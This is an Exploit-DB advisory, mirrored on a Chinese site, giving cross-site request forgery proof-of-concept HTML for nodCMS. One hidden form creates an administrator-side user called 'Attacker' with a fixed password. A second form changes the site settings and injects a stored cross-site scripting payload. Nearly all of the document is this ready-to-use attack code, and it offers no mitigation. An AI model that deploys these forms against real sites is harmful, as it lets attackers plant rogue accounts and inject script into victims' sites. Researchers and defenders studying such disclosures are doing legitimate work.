nodCMS – Cross-Site Request Forgery - 体验盒子

作者： Amir.ght

日期： 2016-11-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40707/

# Exploit Title :nodcms Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : -
# Date : 29/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage :http://www.nodcms.com/en
 Software link :
https://github.com/khodakhah/nodcms/archive/master.zip



########################### CSRF PoC ###############################
# create User: username=Attacker & password=123456

<html>
<!-- CSRF PoC-->
<body>
<form name="form0" action="http://SiteName/admin/user_manipulate" method="POST">
<input type="hidden" name="data[username]" value="Attacker" />
<input type="hidden" name="data[email]" value="Attacker@attacker.com" />
<input type="hidden" name="data[fullname]" value="Atacker" />
<input type="hidden" name="data[password]" value="123456" />
<input type="hidden" name="data[status]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
####################################################################
 # CSRF/Xss
<html>
<!-- CSRF PoC-->
<body>
<form name="form1" action="http://sitename/admin/settings/generall" method="POST">
<input type="hidden" name="data[language_id]" value="1" />
<input type="hidden" name="data[company]" value="<script>alert(/xss/)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
####################################################################
#-# Discovered by : Amir.ght